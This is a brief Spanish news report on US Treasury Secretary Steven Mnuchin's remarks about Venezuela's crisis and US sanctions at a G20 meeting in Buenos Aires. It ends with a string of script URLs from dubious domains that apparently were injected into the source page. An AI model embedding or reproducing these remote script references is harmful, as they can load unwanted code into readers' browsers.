Durante la tercera reunión de ministros del G20, el secretario del Tesoro de Estados Unidos aseguró que la situación de Venezuela es «muy difícil».

Steven Mnuchin, secretario del Tesoro de los Estados Unidos, aseguró que su gobierno monitorea «muy de cerca la crisis venezolana» por lo que se mantiene en constante diálogo con sus aliados.

Mnuchin ofreció estas declaraciones durante la tercera reunión de ministros del G20 que se realiza en Buenos Aires, Argentina, durante este fin de semana.

«La de Venezuela es una situación muy difícil. La pobreza es completamente inaceptable. Este país tenía una economía muy sana, con recursos naturales y no hay razón para que el pueblo sufra y viva así», aseguró el secratrió, según lo reseñado por Infobae.

Resaltó que las sanciones tomadas por el gobierno de Estados Unidos tienen como finalidad impactar directamente en los políticos acusados y no en el pueblo.

Funcionarios del gobierno de Venezuela fueron sancionados por el gobierno estadounidense, incluyendo al presidente de la República Nicolás Maduro. Todos son investigas por su presunta vinculación con narcotráfico, terrorismo y corrupción.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=38https://devlinkin.xyz/addons/lnkr5.min.jshttps://devlinkin.xyz/addons/lnkr30_nt.min.jshttps://eluxer.net/code?id=105&subid=51824_6748_

Loading...